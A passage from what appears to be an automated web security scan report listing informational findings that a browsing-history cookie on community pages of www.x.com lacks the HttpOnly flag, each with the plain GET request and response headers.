Set-Cookie: jive.recentHistory.-1=31342c323133313b31342c323030343b31342c323033393b31342c323034303b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=70307 t=1313157070898066
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.28. https://www.x.com/community/ppx/global/de  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/de

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/de HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034323b31342c323133313b31342c323034313b31342c323034303b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:12 GMT; Path=/
Vary: User-Agent
JP: D=91052 t=1313157072186357
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.29. https://www.x.com/community/ppx/global/fr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/fr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/fr HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034313b31342c323034303b31342c323033393b31342c323133313b31342c323030343b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:11 GMT; Path=/
Vary: User-Agent
JP: D=90705 t=1313157071522380
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.30. https://www.x.com/community/ppx/global/it  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/it

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/it HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034333b31342c323133303b31342c323034323b31342c323030343b31342c323034313b31342c323034303b31342c323133313b31342c323033393b31342c323131343b31342c323133333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:13 GMT; Path=/
Vary: User-Agent
JP: D=83031 t=1313157073107237
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.31. https://www.x.com/community/ppx/global/jp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/jp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/jp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133303b31342c323034323b31342c323034313b31342c323034333b31342c323030343b31342c323034303b31342c323133313b31342c323033393b31342c323131343b31342c323133333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:13 GMT; Path=/
Vary: User-Agent
JP: D=64298 t=1313157073255195
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.32. https://www.x.com/community/ppx/global/mx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/mx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/mx HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034343b31342c323133303b31342c323030343b31342c323034323b31342c323034333b31342c323034313b31342c323034303b31342c323133313b31342c323033393b31342c323131343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:14 GMT; Path=/
Vary: User-Agent
JP: D=84686 t=1313157074147841
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.33. https://www.x.com/community/ppx/global/nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/nl HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034353b31342c323034333b31342c323133303b31342c323034343b31342c323030343b31342c323034323b31342c323034313b31342c323034303b31342c323133313b31342c323033393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:14 GMT; Path=/
Vary: User-Agent
JP: D=74016 t=1313157074525656
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.34. https://www.x.com/community/ppx/global/sp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/sp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/sp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b31342c323034323b31342c323034313b31342c323034303b31342c323133313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:15 GMT; Path=/
Vary: User-Agent
JP: D=120118 t=1313157075242154
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.35. https://www.x.com/community/ppx/global/uk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/uk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/uk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034373b31342c323034343b31342c323034363b31342c323034353b31342c323034333b31342c323133303b31342c323030343b31342c323034323b31342c323034313b31342c323034303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:15 GMT; Path=/
Vary: User-Agent
JP: D=132311 t=1313157075777765
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.36. https://www.x.com/community/ppx/ipn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ipn

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/ipn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032383b31342c323032363b31342c323032373b31342c323032303b31342c323031383b31342c323036333b31342c323031373b31342c323030363b31342c323031363b31342c323234363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:01 GMT; Path=/
Vary: User-Agent
JP: D=93490 t=1313157061548233
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.37. https://www.x.com/community/ppx/marketplaces  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/marketplaces

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/marketplaces HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134323b31342c323134353b31342c323134333b31342c323030353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=108959 t=1313157078551586
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.38. https://www.x.com/community/ppx/mass_pay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/mass_pay

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/mass_pay HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031313b31342c323030393b31342c323030373b31342c323030333b31342c323031343b31342c323030383b31342c323031303b31342c323031393b31342c323237363b31342c323237303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:34 GMT; Path=/
Vary: User-Agent
JP: D=98932 t=1313157034722623
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.39. https://www.x.com/community/ppx/offlineanddevices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/offlineanddevices

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/offlineanddevices HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134363b31342c323134323b31342c323030353b31342c323134333b31342c323134353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=113532 t=1313157078857855
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.40. https://www.x.com/community/ppx/p2p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/p2p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/p2p HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134343b31342c323134323b31342c323134333b31342c323134353b31342c323134363b31342c323030353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:19 GMT; Path=/
Vary: User-Agent
JP: D=81213 t=1313157079302842
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.41. https://www.x.com/community/ppx/payflow_link  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_link

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/payflow_link HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:56 GMT; Path=/
Vary: User-Agent
JP: D=81349 t=1313157056540618
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.42. https://www.x.com/community/ppx/payflow_pro  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_pro

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/payflow_pro HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031343b31342c323030393b31342c323030383b31342c323031303b31342c323031393b31342c323237363b31342c323237303b31342c323030353b31342c323030373b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:33 GMT; Path=/
Vary: User-Agent
JP: D=271432 t=1313157033322018
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.43. https://www.x.com/community/ppx/payflow_xml_reporting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_xml_reporting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/payflow_xml_reporting HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032373b31342c323032303b31342c323032363b31342c323031383b31342c323031373b31342c323036333b31342c323030363b31342c323031363b31342c323234363b31342c323031353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:01 GMT; Path=/
Vary: User-Agent
JP: D=106498 t=1313157060903457
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.44. https://www.x.com/community/ppx/pdt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/pdt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/pdt HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032393b31342c323033303b31342c323032303b31342c323032373b31342c323032383b31342c323036333b31342c323032363b31342c323031383b31342c323031373b31342c323030363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=122974 t=1313157061920177
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.45. https://www.x.com/community/ppx/permissions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/permissions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/permissions HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032303b31342c323032363b31342c323031363b31342c323031373b31342c323030363b31342c323031383b31342c323036333b31342c323234363b31342c323031353b31342c323031333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:00 GMT; Path=/
Vary: User-Agent
JP: D=124196 t=1313157059978751
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.46. https://www.x.com/community/ppx/press  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/press

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/press HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134393b31342c323038323b31342c323030353b31342c323134363b31342c323134343b31342c323038363b31342c323134323b31342c323134333b31342c323134353b31342c323034373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:20 GMT; Path=/
Vary: User-Agent
JP: D=85690 t=1313157080601110
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.47. https://www.x.com/community/ppx/recurring_billing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/recurring_billing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/recurring_billing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031373b31342c323031363b31342c323031353b31342c323234363b31342c323030363b31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:59 GMT; Path=/
Vary: User-Agent
JP: D=113300 t=1313157058930963
Cache-Control: no-cache, private
